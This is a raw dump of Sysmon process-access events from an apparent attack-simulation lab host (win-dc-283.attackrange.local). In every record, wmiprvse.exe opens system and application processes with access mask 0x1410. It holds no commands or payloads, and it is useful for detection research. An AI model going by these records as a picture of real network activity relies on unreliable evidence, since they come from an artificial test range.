15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 